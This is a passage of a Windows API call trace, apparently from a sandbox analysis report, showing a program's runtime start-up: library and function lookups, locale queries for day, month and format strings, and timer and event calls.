LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0112.692] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x224450 [0112.692] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0112.692] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0112.692] GetLastError () returned 0x7a [0112.692] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0112.692] GetCurrentThreadId () returned 0xd84 [0112.692] GetCurrentThreadId () returned 0xd84 [0112.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0112.692] GetThreadLocale () returned 0x409 [0112.692] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0112.693] GetThreadLocale () returned 0x409 [0112.693] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, 
Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0112.693] GetCurrentThreadId () returned 0xd84 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0112.693] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0112.693] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0112.694] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0112.694] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0112.694] GetProcAddress 
(hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0112.695] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0112.695] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0112.695] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0112.695] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16948425000) returned 1 [0112.695] GetTickCount () returned 0x26fd2 [0112.695] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x94)) [0112.695] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, 
wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x94)) [0112.695] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16948438600) returned 1 [0112.695] GetTickCount () returned 0x26fd2 [0112.695] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x94)) [0112.695] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x94)) [0112.695] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0112.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0112.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0112.695] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0112.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0112.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0112.695] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0112.696] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0112.696] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0112.696] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0112.696] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0112.696] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0112.696] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0112.696] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0112.696] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0112.696] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0112.696] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.697] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0112.697] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0112.697] GetThreadLocale () returned 0x409 [0112.697] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0112.697] GetCurrentThreadId () returned 0xd84 [0112.697] GetCurrentThreadId () returned 0xd84 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0112.697] GetThreadLocale () returned 0x409 [0112.697] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0112.697] GetThreadLocale () returned 0x409 [0112.697] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0112.697] GetCurrentThreadId () returned 0xd84 
[0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 
8 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 
[0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0112.698] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, 